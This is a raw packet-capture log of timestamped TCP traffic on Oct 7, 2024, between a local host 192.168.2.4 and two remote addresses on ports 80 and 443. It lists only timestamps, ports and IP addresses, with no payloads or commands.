                                                                                                                                      Oct 7, 2024 03:23:10.421911001 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:10.421919107 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.421926022 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:10.421940088 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:10.421955109 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:10.422010899 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.422024965 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.422049999 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:10.422055006 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.422056913 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:10.422069073 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.422087908 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:10.422087908 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.422100067 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:10.422102928 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.422117949 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.422123909 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:10.422132015 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.422139883 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:10.422147036 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.422173023 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:10.422183037 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:10.422209978 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.422230959 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.422243118 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:10.422245979 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.422260046 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.422270060 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:10.422283888 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:10.422285080 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.422300100 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:10.422313929 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:10.460279942 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.460314989 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.460336924 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:10.460452080 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:10.460454941 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.460500956 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:10.460503101 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.460535049 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.460556984 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:10.460572958 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:10.460582972 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.460616112 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.460623980 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:10.460649014 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.460652113 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:10.460681915 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.460699081 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:10.460716963 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:10.460728884 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.460762978 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.460777998 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:10.460804939 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:10.460810900 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.460846901 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.460892916 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.460902929 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:10.460931063 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:10.460942984 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.460974932 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.460983038 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:10.461007118 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.461011887 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:10.461041927 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:10.461055040 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.461086988 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.461097002 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:10.461117029 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.461122990 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:10.461149931 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.461154938 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:10.461186886 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:10.461199999 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.461231947 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.461241961 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:10.461261034 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.461266041 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:10.461307049 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:10.461307049 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.461339951 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.461357117 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:10.461369991 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.461379051 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:10.461401939 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.461414099 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:10.461433887 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.461447954 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:10.461467028 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.461472034 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:10.461493015 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.461503983 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:10.461527109 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.461532116 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:10.461559057 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.461563110 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:10.461587906 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.461595058 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:10.461620092 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.461623907 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:10.461652994 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:10.461652040 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.461684942 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.461690903 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:10.461715937 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.461723089 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:10.461747885 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.461755037 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:10.461779118 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.461786032 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:10.461811066 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.461816072 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:10.461843014 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.461848974 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:10.461874962 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.461880922 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:10.461906910 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.461915016 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:10.461939096 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.461946011 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:10.461971045 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.461977959 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:10.462003946 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.462009907 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:10.462035894 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.462043047 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:10.462070942 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:10.477149010 CEST4434982013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.477931976 CEST49820443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:10.477953911 CEST4434982013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.478348970 CEST49820443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:10.478362083 CEST4434982013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.485033989 CEST4434981613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.485049009 CEST4434981613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.485100985 CEST49816443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:10.485140085 CEST4434981613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.485162973 CEST4434981613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.485205889 CEST49816443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:10.485344887 CEST49816443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:10.485378027 CEST4434981613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.485403061 CEST49816443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:10.485416889 CEST4434981613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.489187002 CEST4434981713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.489253044 CEST4434981713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.489310980 CEST49817443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:10.490505934 CEST49821443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:10.490530014 CEST4434982113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.490612030 CEST49821443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:10.490693092 CEST49817443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:10.490726948 CEST4434981713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.490753889 CEST49817443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:10.490768909 CEST4434981713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.490773916 CEST49821443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:10.490780115 CEST4434982113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.493338108 CEST49822443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:10.493345976 CEST4434982213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.493402958 CEST49822443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:10.493778944 CEST49822443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:10.493788958 CEST4434982213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.497117996 CEST4434981813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.497257948 CEST4434981813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.497318983 CEST49818443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:10.497360945 CEST49818443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:10.497376919 CEST4434981813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.497406960 CEST49818443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:10.497420073 CEST4434981813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.498212099 CEST4434981913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.498261929 CEST4434981913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.498322010 CEST49819443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:10.498341084 CEST4434981913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.498374939 CEST4434981913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.498423100 CEST49819443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:10.498878956 CEST49819443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:10.498897076 CEST4434981913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.498919964 CEST49819443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:10.498930931 CEST4434981913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.499959946 CEST49823443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:10.500011921 CEST4434982313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.500070095 CEST49823443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:10.500194073 CEST49823443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:10.500221014 CEST4434982313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.502909899 CEST49824443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:10.502933979 CEST4434982413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.503001928 CEST49824443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:10.503473043 CEST49824443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:10.503496885 CEST4434982413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.575201035 CEST4434982013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.575252056 CEST4434982013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.575316906 CEST49820443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:10.575334072 CEST4434982013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.575382948 CEST49820443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:10.575433016 CEST4434982013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.575445890 CEST49820443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:10.575488091 CEST4434982013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.575520992 CEST49820443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:10.575520992 CEST49820443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:10.575541019 CEST4434982013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.575560093 CEST4434982013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.577366114 CEST49825443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:10.577375889 CEST4434982513.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:10.577445030 CEST49825443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:10.577770948 CEST49825443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:10.577785969 CEST4434982513.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:11.147774935 CEST4434982213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:11.148309946 CEST49822443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:11.148323059 CEST4434982213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:11.148699045 CEST49822443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:11.148705959 CEST4434982213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:11.163322926 CEST4434982113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:11.164171934 CEST4434982313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:11.164551020 CEST49821443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:11.164561033 CEST4434982113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:11.164979935 CEST49821443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:11.164984941 CEST4434982113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:11.165245056 CEST49823443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:11.165285110 CEST4434982313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:11.165611982 CEST49823443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:11.165626049 CEST4434982313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:11.170881033 CEST4434982413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:11.171622038 CEST49824443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:11.171637058 CEST4434982413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:11.171983004 CEST49824443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:11.171993017 CEST4434982413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:11.232525110 CEST4434982513.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:11.233057022 CEST49825443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:11.233066082 CEST4434982513.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:11.233453989 CEST49825443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:11.233458042 CEST4434982513.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:11.263608932 CEST4434982313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:11.265630007 CEST4434982113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:11.265655041 CEST4434982113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:11.265866041 CEST49821443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:11.265875101 CEST4434982113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:11.265958071 CEST49821443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:11.265969038 CEST4434982113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:11.265974998 CEST49821443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:11.266139030 CEST4434982113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:11.266180038 CEST4434982113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:11.266222954 CEST49821443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:11.267082930 CEST4434982313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:11.267157078 CEST49823443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:11.267199993 CEST49823443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:11.267199993 CEST49823443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:11.267225981 CEST4434982313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:11.267246008 CEST4434982313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:11.269418001 CEST49826443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:11.269443989 CEST4434982613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:11.269500971 CEST49826443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:11.269849062 CEST49826443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:11.269859076 CEST4434982613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:11.270834923 CEST49827443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:11.270886898 CEST4434982713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:11.270957947 CEST49827443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:11.271075964 CEST49827443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:11.271097898 CEST4434982713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:11.273641109 CEST4434982413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:11.273772955 CEST4434982413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:11.273858070 CEST49824443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:11.277630091 CEST49824443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:11.277650118 CEST4434982413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:11.277676105 CEST49824443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:11.277688026 CEST4434982413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:11.281892061 CEST49828443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:11.281970978 CEST4434982813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:11.282114983 CEST49828443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:11.282306910 CEST49828443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:11.282340050 CEST4434982813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:11.516014099 CEST4434982213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:11.516102076 CEST4434982213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:11.516292095 CEST49822443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:11.516367912 CEST49822443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:11.516381025 CEST4434982213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:11.516391039 CEST49822443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:11.516395092 CEST4434982213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:11.517059088 CEST4434982513.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:11.517190933 CEST4434982513.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:11.517257929 CEST49825443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:11.517663002 CEST49825443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:11.517666101 CEST4434982513.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:11.517682076 CEST49825443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:11.517685890 CEST4434982513.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:11.520370960 CEST49829443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:11.520448923 CEST4434982913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:11.520540953 CEST49829443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:11.520729065 CEST49829443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:11.520765066 CEST4434982913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:11.521322966 CEST49830443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:11.521343946 CEST4434983013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:11.521414995 CEST49830443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:11.521557093 CEST49830443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:11.521598101 CEST4434983013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:11.922907114 CEST4434982813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:11.927723885 CEST49828443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:11.927786112 CEST4434982813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:11.928070068 CEST49828443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:11.928081989 CEST4434982813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:11.931010962 CEST4434982613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:11.931318998 CEST49826443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:11.931332111 CEST4434982613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:11.931700945 CEST49826443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:11.931706905 CEST4434982613.107.246.45192.168.2.4
